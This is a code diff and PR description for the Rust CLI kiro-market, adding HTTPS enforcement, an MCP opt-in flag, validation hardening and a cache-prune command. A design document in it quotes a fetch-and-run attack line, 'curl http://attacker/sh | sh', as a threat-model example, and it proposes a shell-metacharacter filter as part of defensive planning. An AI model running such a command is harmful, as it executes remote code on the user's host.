         format!("invalid plugin reference '{plugin_ref}': expected plugin@marketplace")
@@ -81,6 +90,7 @@ pub fn run(plugin_ref: &str, skill_filter: Option<&str>, force: bool) -> Result<
         &agent_scan_paths,
         skill_filter,
         mode,
+        accept_mcp,
         marketplace_name,
         plugin_name,
         version.as_deref(),
@@ -167,6 +177,7 @@ fn run_agent_install(
     agent_scan_paths: &[String],
     skill_filter: Option<&str>,
     mode: InstallMode,
+    accept_mcp: bool,
     marketplace_name: &str,
     plugin_name: &str,
     version: Option<&str>,
@@ -181,6 +192,7 @@ fn run_agent_install(
         plugin_dir,
         agent_scan_paths,
         mode,
+        accept_mcp,
         marketplace_name,
         plugin_name,
         version,

--- a/crates/kiro-market/src/commands/marketplace.rs
+++ b/crates/kiro-market/src/commands/marketplace.rs
@@ -6,7 +6,7 @@ use anyhow::{Context, Result};
 use colored::Colorize;
 use kiro_market_core::cache::CacheDir;
 use kiro_market_core::git::GixCliBackend;
-use kiro_market_core::service::MarketplaceService;
+use kiro_market_core::service::{InsecureHttpPolicy, MarketplaceAddOptions, MarketplaceService};
 
 use crate::cli::MarketplaceAction;
 
@@ -18,25 +18,35 @@ pub fn run(action: &MarketplaceAction) -> Result<()> {
     let svc = MarketplaceService::new(cache, git);
 
     match action {
-        MarketplaceAction::Add { source, protocol } => add(&svc, source, *protocol),
+        MarketplaceAction::Add {
+            source,
+            protocol,
+            allow_insecure_http,
+        } => add(
+            &svc,
+            source,
+            // Builder construction so adding future fields to
+            // MarketplaceAddOptions (it's `#[non_exhaustive]`) is an
+            // additive change — this call site picks up new strict
+            // defaults automatically.
+            MarketplaceAddOptions::new(*protocol).with_insecure_http(if *allow_insecure_http {
+                InsecureHttpPolicy::Allow
+            } else {
+                InsecureHttpPolicy::Reject
+            }),
+        ),
         MarketplaceAction::List => list(&svc),
         MarketplaceAction::Update { name } => update(&svc, name.as_deref()),
         MarketplaceAction::Remove { name } => remove(&svc, name),
     }
 }
 
-fn add(
-    svc: &MarketplaceService,
-    source: &str,
-    protocol: kiro_market_core::git::GitProtocol,
-) -> Result<()> {
+fn add(svc: &MarketplaceService, source: &str, opts: MarketplaceAddOptions) -> Result<()> {
     print!("  Adding marketplace...");
     // stdout is line-buffered when attached to a terminal; without flush
     // the "..." appears only after the clone completes.
     let _ = std::io::stdout().flush();
-    let result = svc
-        .add(source, protocol)
-        .context("failed to add marketplace")?;
+    let result = svc.add(source, opts).context("failed to add marketplace")?;
 
     println!(
         " {} Added {} ({} plugin{})",

--- a/crates/kiro-market/src/commands/mod.rs
+++ b/crates/kiro-market/src/commands/mod.rs
@@ -1,5 +1,6 @@
 //! Command implementations for the kiro-market CLI.
 
+pub mod cache;
 mod common;
 pub mod info;
 pub mod install;

--- a/crates/kiro-market/src/main.rs
+++ b/crates/kiro-market/src/main.rs
@@ -22,10 +22,21 @@ fn main() -> Result<()> {
         colored::control::set_override(false);
     }
 
+    // Default filter explicitly admits `kiro_market_core=warn` because
+    // several security-critical "skip + warn" paths live in the core crate
+    // (e.g. project::copy_dir_recursive logging a hardlink/symlink skip,
+    // platform::sys::StagingGuard logging a Windows staging-cleanup
+    // failure). Without the core crate listed here, the default
+    // `kiro_market=info` filter would silently drop those warnings, and
+    // a user whose install was incomplete because of a hardlink in the
+    // source tree would see a successful "✓ installed" with no signal
+    // that files were dropped. Bumping verbosity escalates both crates
+    // in lockstep so `-v` and `-vv` continue to be the way to see
+    // everything.
     let default_filter = match cli.verbose {
-        0 => "kiro_market=info",
-        1 => "kiro_market=debug",
-        _ => "kiro_market=trace",
+        0 => "kiro_market=info,kiro_market_core=warn",
+        1 => "kiro_market=debug,kiro_market_core=debug",
+        _ => "kiro_market=trace,kiro_market_core=trace",
     };
 
     tracing_subscriber::fmt()
@@ -42,10 +53,12 @@ fn main() -> Result<()> {
             plugin_ref,
             skill,
             force,
-        } => commands::install::run(plugin_ref, skill.as_deref(), *force),
+            accept_mcp,
+        } => commands::install::run(plugin_ref, skill.as_deref(), *force, *accept_mcp),
         cli::Command::List => commands::list::run(),
         cli::Command::Update { plugin_ref } => commands::update::run(plugin_ref.as_deref()),
         cli::Command::Remove { skill_name } => commands::remove::run(skill_name),
         cli::Command::Info { plugin_ref } => commands::info::run(plugin_ref),
+        cli::Command::Cache { action } => commands::cache::run(action),
     }
 }

--- a/crates/kiro-market/tests/cli_tests.rs
+++ b/crates/kiro-market/tests/cli_tests.rs
@@ -143,6 +143,83 @@ fn install_missing_marketplace_fails() {
 }
 
 #[test]
+fn marketplace_add_rejects_http_url_by_default() {
+    // End-to-end coverage of the http:// gate: the CLI must surface the
+    // InsecureSource error without needing the --allow-insecure-http
+    // flag. Without this test, only the service-layer gate is verified
+    // — a regression that drops the CLI plumbing wouldn't be caught.
+    let dir = TempDir::new().expect("temp dir");
+    let output = run_in_dir(
+        dir.path(),
+        &["marketplace", "add", "http://example.com/repo.git"],
+    );
+
+    assert!(
+        !output.status.success(),
+        "http:// add must fail without opt-in"
+    );
+    let err = stderr(&output);
+    assert!(
+        err.contains("http://") && err.contains("allow-insecure-http"),
+        "error must mention http:// and the remediation flag, got:\n{err}"
+    );
+}
+
+#[test]
+fn marketplace_add_help_documents_allow_insecure_http_flag() {
+    // Documentation regression: if the --allow-insecure-http flag is
+    // ever renamed or removed, this test catches it via clap's auto-
+    // generated help. The error message in the gate above references
+    // this flag by name; the two MUST stay in sync.
+    let dir = TempDir::new().expect("temp dir");
+    let output = run_in_dir(dir.path(), &["marketplace", "add", "--help"]);
+    assert!(output.status.success(), "stderr: {}", stderr(&output));
+
+    let out = stdout(&output);
+    assert!(
+        out.contains("--allow-insecure-http"),
+        "marketplace add --help must document --allow-insecure-http:\n{out}"
+    );
+}
+
+#[test]
+fn install_help_documents_accept_mcp_flag() {
+    // Same regression guard for the MCP opt-in: the install help must
+    // document --accept-mcp because the InstallWarning::McpServersRequireOptIn
+    // message references it by name.
+    let dir = TempDir::new().expect("temp dir");
+    let output = run_in_dir(dir.path(), &["install", "--help"]);
+    assert!(output.status.success(), "stderr: {}", stderr(&output));
+
+    let out = stdout(&output);
+    assert!(
+        out.contains("--accept-mcp"),
+        "install --help must document --accept-mcp:\n{out}"
+    );
+}
+
+#[test]
+fn cache_prune_dry_run_on_clean_cache_succeeds() {
+    // Smoke test for the new `cache prune` command: even on an empty
+    // cache (no marketplaces ever added) it must exit zero and report
+    // "no orphans". A regression that mishandles missing dirs would
+    // surface here.
+    let dir = TempDir::new().expect("temp dir");
+    let output = run_in_dir(dir.path(), &["cache", "prune", "--dry-run"]);
+
+    assert!(
+        output.status.success(),
+        "cache prune on a fresh dir must succeed: {}",
+        stderr(&output)
+    );
+    let out = stdout(&output);
+    assert!(
+        out.contains("clean"),
+        "expected 'cache is clean' wording, got:\n{out}"
+    );
+}
+
+#[test]
 fn update_command_exits_nonzero_while_unimplemented() {
     // Regression: the top-level `update` command is a documented stub
     // that previously returned Ok(()), so CI couldn't distinguish

--- a/docs/plans/2026-04-19-deferred-audit-followups.md
+++ b/docs/plans/2026-04-19-deferred-audit-followups.md
@@ -1,0 +1,302 @@
+# Deferred follow-ups from the dep-audit-triage PR
+
+**Branch context**: `chore/dep-audit-triage` resolved 22 items from `fixes.md`
+plus 5 critical issues found during the multi-reviewer PR review. Eight more
+suggestions were tackled in remediation batches (A through H). This document
+captures the **five remaining items** that were intentionally deferred — each
+needs a design decision before implementation.
+
+Each section has the same shape:
+
+- **Problem** — what's wrong and where.
+- **Why it matters** — concrete user / security impact.
+- **Options** — choices, with tradeoffs.
+- **Decision needed** — what we have to know before we can pick.
+- **Scope estimate** — how invasive the work is.
+
+---
+
+## 1. `McpServerConfig::Stdio::command` newtype + executable allowlist
+
+**Problem**
+
+`crates/kiro-market-core/src/agent/types.rs:31-46` defines
+
+```rust
+pub enum McpServerConfig {
+    Stdio { command: String, args: Vec<String>, env: BTreeMap<String, String> },
+    ...
+}
+```
+
+`command` is a free-form `String`. Any agent that ships an MCP server with
+`command: "/bin/sh"`, `command: "rm"`, `command: "curl http://attacker/sh | sh"`
+gets to run that exact binary on the user's host once the user opts in via
+`--accept-mcp`. Today's defenses are: (a) the `--accept-mcp` opt-in itself, and
+(b) the install-time warning that lists transports. Neither inspects the command.
+
+**Why it matters**
+
+The `--accept-mcp` opt-in is binary — once flipped, every Stdio entry in every
+installed agent runs unrestricted. That's the right shape for prototype agents
+the user wrote, but it's coarse for marketplace agents authored by third
+parties. A user who opts in to "Terraform Agent" should not silently grant
+"Random Crypto Tool Agent" the same trust on the next install.
+
+**Options**
+
+1. **Hardcoded allowlist** (`docker`, `node`, `python`, `python3`, `uvx`, `npx`):
+   simplest, unsurprising. Rejects everything else. Real-world MCP server
+   examples almost all use one of these wrappers; non-allowlist commands are
+   rare and worth flagging.
+2. **User-config allowlist** at `~/.config/kiro-market/mcp-allowlist.txt`:
+   per-user policy; ships empty (deny-all) and the user adds binaries as they
+   install agents. Highest correctness, more friction.
+3. **Per-install allowlist via `--accept-mcp <command,...>`**: the user
+   approves the specific commands the install will configure. Forces the user
+   to read the `mcpServers` block before running.
+4. **Newtype only, no allowlist**: `McpCommand::new(s)` rejects empty + shell
+   metacharacters (`;|&$\``); leaves binary identity to runtime. Cheaper but
+   doesn't address the "rm" case.
+
+**Decision needed**
+
+Where does MCP allowlist policy live and who maintains it? CLI users vs Tauri
+desktop users will have different answers — the desktop UI can show a
+per-binary "approve" prompt, the CLI cannot.
+
+**Scope estimate**
+
+- Newtype: ~50 lines + tests in `agent/types.rs`.
+- Hardcoded allowlist: +20 lines + 3 tests.
+- User-config: +200 lines (config file loader, schema, doc, tests).
+- Per-install: +50 lines in `service::install_plugin_agents` + CLI flag plumbing.
+
+---
+
+## 2. `McpServerConfig::Http::headers` should be ordered, not a `BTreeMap`
+
+**Problem**
+
+`crates/kiro-market-core/src/agent/types.rs:48-55` declares
+
+```rust
+Http {
+    url: String,
+    #[serde(default)]
+    headers: BTreeMap<String, String>,
+},
+```
+
+HTTP headers are case-insensitive and **allow duplicates** — `Set-Cookie` is
+the canonical example, but `Forwarded`, `Cache-Control`, and others can also
+repeat. `BTreeMap<String, String>` enforces neither: a YAML
+`headers: { Set-Cookie: a, set-cookie: b }` collapses (alphabetically last
+wins), and a YAML map can't carry two entries with the same key at all. The
+shape silently drops valid configs.
+
+**Why it matters**
+
+Right now no real agent we've seen uses duplicated headers. But the wire
+shape is part of the parser contract — committing to `BTreeMap` makes a future
+agent that needs `Authorization: ...; Authorization: legacy-fallback` impossible
+to express, with no compile-time signal.
+
+**Options**
+
+1. `Vec<(String, String)>`: preserves order and duplicates; trivial dep impact.
+   Loses the case-insensitive lookup ergonomics, but the install layer doesn't
+   look up headers, it just emits them.
+2. `Vec<(HeaderName, HeaderValue)>` from the `http` crate: gets case-insensitive
+   compare for free, validates the bytes (no CRLF injection in header values),
+   adds one workspace dep (~200 KB compiled).
+3. Custom newtype `Headers(Vec<(HeaderName, HeaderValue)>)` with `Deserialize`
+   that accepts both `seq-of-pairs` and `map`: best UX for YAML authors, more
+   parser code.
+
+**Decision needed**
+
+Are we willing to add the `http` crate as a workspace dep? It's the
+standards-correct primitive but the only consumer would be this one field
+today. If we expect the Tauri side to grow more HTTP-shaped types
+(MCP discovery? remote skill catalogs?), the dep pays for itself. If not,
+`Vec<(String, String)>` is enough.
+
+**Scope estimate**
+
+- Option 1 (Vec of String pairs): ~30 lines + 4 tests.
+- Options 2-3: +1 workspace dep + ~80 lines + 6 tests.
+
+---
+
+## 3. Copilot inner `tools: ["*"]` allowlist drop should warn at parse time
+
+**Problem**
+
+`crates/kiro-market-core/src/agent/parse_copilot.rs:23-46` deserializes
+Copilot's `mcp-servers:` map into `BTreeMap<String, McpServerConfig>`. The
+typed schema has no field for the per-server `tools: [...]` allowlist that
+Copilot uses to scope down a server's surface. Serde silently ignores unknown
+fields, so a Copilot agent that scoped `terraform` to `tools: ["read"]` gets
+installed in Kiro with **all** of `terraform`'s tools enabled — a privilege
+widening invisible to the user.
+
+**Why it matters**
+
+This is the worst kind of compatibility break: the install succeeds, the agent
+runs, the user thinks they got what they wrote, and they have more capability
+than they asked for. Compare to the typed-name validation we added in
+`validation.rs::validate_name` — same shape (silent drop → loud reject), but we
+haven't built it for MCP `tools` because it requires a custom `Deserialize`.
+
+**Options**
+
+1. **Custom `Deserialize` for `McpServerConfig`** that captures and emits
+   `tools` as a discardable field, then surfaces an
+   `InstallWarning::McpToolsAllowlistDropped { agent, server, tools }` in the
+   install loop. Highest correctness, ~150 lines.
+2. **Document-only**: add a notice to the agent install help text and CLI
+   `--accept-mcp` doc. Cheap but relies on the user reading docs.
+3. **Reject at parse**: refuse to install any agent with a Copilot
+   `tools: [...]` allowlist that we can't honor. Strictest, breaks all
+   existing MCP-bearing Copilot agents until they remove the field.
+
+**Decision needed**
+
+How loud should we be about this widening? Option 3 is the safest — broken
+loudly beats working insecurely. Option 1 is the user-friendly middle. Need to
+know whether we're shipping to users who have already-imported Copilot agents.
+
+**Scope estimate**
+
+- Option 1: ~150 lines (custom Deserialize + warning variant + install
+  plumbing + 4 tests).
+- Option 3: ~50 lines (parse-time error + 2 tests + breaking-change CHANGELOG
+  note).
+
+---
+
+## 4. `Sha` newtype on `StructuredSource::sha`
+
+**Problem**
+
+`crates/kiro-market-core/src/marketplace.rs::StructuredSource` carries
+`sha: Option<String>` on each variant. The string is validated only at
+`verify_sha` time (defense in depth from the audit). A serde-time check would
+catch a malformed pin earlier — at marketplace add, not at first install — and
+make the type system carry the invariant.
+
+**Why it matters**
+
+Every `verify_sha` call site has to remember to validate. The runtime check is
+correct today but a future caller (e.g. a `kiro-market info` that displays the
+SHA) might skip it. Parse-don't-validate is the project's stated pattern for
+`RelativePath` and `GitRef` already.
+
+**Options**
+
+1. **Newtype mirroring `RelativePath`**: `Sha(String)` with `Deserialize` that
+   calls `validate_sha_prefix`. Each `StructuredSource` variant's `sha` field
+   becomes `Option<Sha>`. `verify_sha` takes `&Sha` and skips the structural
+   validation step.
+2. **Skip**: keep runtime validation. Pay the cost of remembering to call it
+   at every consumer.
+
+**Decision needed**
+
+Mostly mechanical. The blocking concern: existing test fixtures use short SHAs
+like `"abc123"` (6 chars, fails `MIN_SHA_PREFIX_LEN=7`). They'd need to be
+updated to use 7+ char hex SHAs. ~10 fixture sites across `marketplace.rs` and
+`service.rs` tests.
+
+**Scope estimate**
+
+- ~60 lines for the newtype + Deserialize + Display.
+- ~30 lines updating `StructuredSource` variants.
+- ~10 fixture updates.
+- 3-4 new tests for serde-time rejection of invalid SHAs.
+
+---
+
+## 5. `RelativePath` normalization at construction
+
+**Problem**
+
+`crates/kiro-market-core/src/validation.rs::RelativePath` validates traversal
+and absolute paths but does not normalize. `./skills/`, `skills/`, and
+`./skills` all pass and compare unequal. The dedup logic in
+`service::build_registry_entries` (`crates/kiro-market-core/src/service.rs:1239-1250`)
+explicitly trims leading `./` and trailing `/` to compensate. Any future
+caller that compares `RelativePath`s without going through that helper can
+generate duplicate `PluginEntry` rows for the same on-disk directory.
+
+**Why it matters**
+
+Today the only consumer is `build_registry_entries`. Future code that
+compares relative paths (a "find the plugin entry that matches this
+directory" search, for example) will silently miss matches that differ only in
+trivial spelling. The risk is not security but correctness drift — the kind of
+bug that surfaces months later as a duplicate-row in a UI list.
+
+**Options**
+
+1. **Normalize at construction**: strip leading `./`, normalize separators to
+   `/`, strip trailing `/`. The newtype's invariant becomes "canonical form
+   of a safe relative path". Existing callers that round-trip strings would
+   see the normalized form (potentially observable in `marketplace.json`
+   re-serialization).
+2. **Document the existing pattern**: leave `RelativePath` as-is; add a
+   `RelativePath::normalized_for_dedup(&self) -> &str` method that callers
+   doing comparison must use. Cheaper but easy to forget.
+
+**Decision needed**
+
+Are we willing to change the on-disk wire format? Option 1 means a
+marketplace.json with `"source": "./plugins/foo"` will round-trip as
+`"source": "plugins/foo"`. That's a trivial normalization but it's a wire-format
+change visible in git diffs of cached files.
+
+**Scope estimate**
+
+- Option 1: ~40 lines + 6 round-trip tests + cleanup of the ad-hoc trim in
+  `build_registry_entries`.
+- Option 2: ~20 lines + 2 tests; relies on convention.
+
+---
+
+## Cross-cutting note: `kiro_market_core=warn` filter is the wrong long-term fix
+
+The "Critical #4" fix from the review pass widened the default tracing filter
+in `crates/kiro-market/src/main.rs` so `warn!`s from `kiro_market_core` reach
+the user. That's the right immediate mitigation but the structural answer is:
+
+> Skip events should be data on the install result, not log lines.
+
+Today, `project::copy_dir_recursive` skips symlinks/hardlinks with `warn!`,
+and `platform::sys::create_local_link` warns from a `Drop` impl. Neither shows
+up in the `InstallSkillsResult` / `InstallAgentsResult` returned to the
+caller. A Tauri frontend that doesn't subscribe to tracing logs has no way to
+display these to the user.
+
+The fix is a new `InstallWarning::FileSkipped { path, reason: SkipReason }`
+variant plus the plumbing to bubble skip events up from copy_dir_recursive
+through the install layer. Recorded here as **deferred** because (a) it
+requires changing the return type of a private helper used in many places,
+and (b) the current tracing-filter widening covers the CLI path well enough
+to ship.
+
+Estimated scope: ~150 lines + 4 tests.
+
+---
+
+## Suggested ordering when picking these up
+
+1. **#3 (Copilot tools privilege widening)** first — security-impacting,
+   user-invisible.
+2. **#5 (RelativePath normalization)** — small, mechanical, tightens the
+   invariant.
+3. **#4 (Sha newtype)** — natural follow-on to the audit's defense-in-depth.
+4. **Cross-cutting (skip events as data)** — unblocks better Tauri UX.
+5. **#1 (Stdio command allowlist)** — needs the policy decision first.
+6. **#2 (HTTP headers shape)** — wait until a real agent actually needs
+   duplicate headers.


### PR DESCRIPTION
## Summary

Resolves all 22 items from the dep-audit-triage scope plus 5 critical bugs and 12 important issues surfaced during a multi-reviewer PR review (`comment-analyzer`, `type-design-analyzer`, `silent-failure-hunter`, `pr-test-analyzer`, `code-reviewer`, `code-simplifier`).

## What's in this PR

**Security gates**
- HTTPS forced in libcurl: workspace `curl` shim is now activated (it wasn't before — `cargo metadata` confirmed curl-sys was building with no features); new `assert-curl-tls` CI job in `ci-success` blocks merge on regression.
- `marketplace add` refuses `http://` unless `--allow-insecure-http` (typed `InsecureHttpPolicy::{Reject,Allow}`).
- `install` skips MCP-bearing agents unless `--accept-mcp`; structured `InstallWarning::McpServersRequireOptIn` lists transports. `--force` does not bypass.
- Typed `McpServerConfig::{Stdio, Http, Sse}` replaces `BTreeMap<String, serde_json::Value>` — malformed entries fail at parse time.

**Concurrency / consistency**
- `MarketplaceService::add` wraps exists-check + rename + register + plugin-registry-write under one registry lock; new `add_serializes_concurrent_same_name_adds` (8-thread fanout) + `add_and_remove_race_leaves_consistent_state` tests.
- **Bug fix:** `prune_orphans` no longer deletes a registered marketplace whose name starts with `_pending_` (data loss; regression test added).

**Validation hardening**
- `validate_name` rejects control chars, leading/trailing whitespace, trailing dot, Windows reserved names (CON/PRN/AUX/NUL/COM1-9/LPT1-9 + extension variants).
- `validate_relative_path` rejects backslash anywhere (Unix/Windows asymmetry).
- `verify_sha` enforces 7-64 hex chars + case-insensitive compare; new `GitError::InvalidSha { reason: InvalidShaReason::{TooShort,TooLong,NonHex} }` typed enum.
- `skill::parse_frontmatter` now calls `validate_name` (mirrors agent parsers).

**Filesystem hardening**
- `project::copy_dir_recursive` skips hardlinks (`nlink>1`) on Unix.
- `platform::copy_dir_recursive` (Windows) refuses reparse-point-flagged entries via `FILE_ATTRIBUTE_REPARSE_POINT`.
- `create_local_link` (Windows copy fallback) stages into `_pending_<name>/` with shared `raii::DirCleanupGuard`.
- `agent::discover` uses `symlink_metadata`.

**Durability**
- `atomic_write`: tmp `sync_all` + parent-dir `sync_all` on POSIX; `debug_assert!` on absolute path.
- `file_lock` module doc now accurately covers NFS (NFSv4 `local_lock` semantics), overlayfs, SMB caveats; `git::run_git` uses `Stdio::null()` so credential helpers don't stall CI; `GitError::AuthenticationRequired { url }` translates the resulting cryptic libcurl errors.

**Cache lifecycle**
- New `kiro-market cache prune [--dry-run]` removes orphaned marketplace clones, plugin clones, plugin-registry files, `_pending_*` staging dirs, and stale `<plugin>.lock` files. `PruneMode` + `targets: Vec<PathBuf>` replaces parallel-Vec encoding.

**Type design**
- `#[non_exhaustive]` on `MarketplaceAddOptions`, `PruneReport`, `PruneFailure`, `ApplySettingError`, `InvalidShaReason`.
- Builder API on `MarketplaceAddOptions` (`new(protocol).allow_insecure_http()`).
- New `apply_registered_setting` in core combines registry validation + value-type check + write atomically; Tauri `set_kiro_setting` now uses it.
- Shared `crate::raii::DirCleanupGuard` collapses `TempDirGuard` and `StagingGuard`.

**UX**
- Default tracing filter widened to `kiro_market_core=warn` so symlink/hardlink skip events reach the user (the structural fix — surfacing skips through the install result — is in the deferred follow-ups).

## Test plan

- [x] `cargo test --workspace` — **513 tests pass** (was 373 at session start, +140 net).
- [x] `cargo clippy --workspace -- -D warnings` clean.
- [x] `cargo fmt --all -- --check` clean.
- [x] CI: validate that the new `assert-curl-tls` job runs and that it's now in `ci-success`'s `needs:` list (this PR adds both).
- [x] Manual: 4 new CLI integration tests in `crates/kiro-market/tests/cli_tests.rs` cover `--allow-insecure-http`, `--accept-mcp`, `cache prune --dry-run`, and the `--help` text for the security flags.

## Deferred

5 reviewer suggestions are intentionally out of scope and written up at `docs/plans/2026-04-19-deferred-audit-followups.md` with Problem / Why-it-matters / Options / Decision-needed / Scope sections:

1. `McpServerConfig::Stdio::command` newtype + executable allowlist (needs policy decision)
2. `McpServerConfig::Http::headers` shape (needs `http` crate dep decision)
3. Copilot inner `tools: ["*"]` allowlist drop should warn at parse (privilege widening; needs custom `Deserialize`)
4. `Sha` newtype on `StructuredSource` (cascades through tests)
5. `RelativePath` normalization at construction (changes parse semantics)

Plus a cross-cutting note that the tracing-filter widening is the immediate fix; the structural answer is "skip events as `InstallWarning` data," tracked separately.

🤖 Generated with [Claude Code](https://claude.com/claude-code)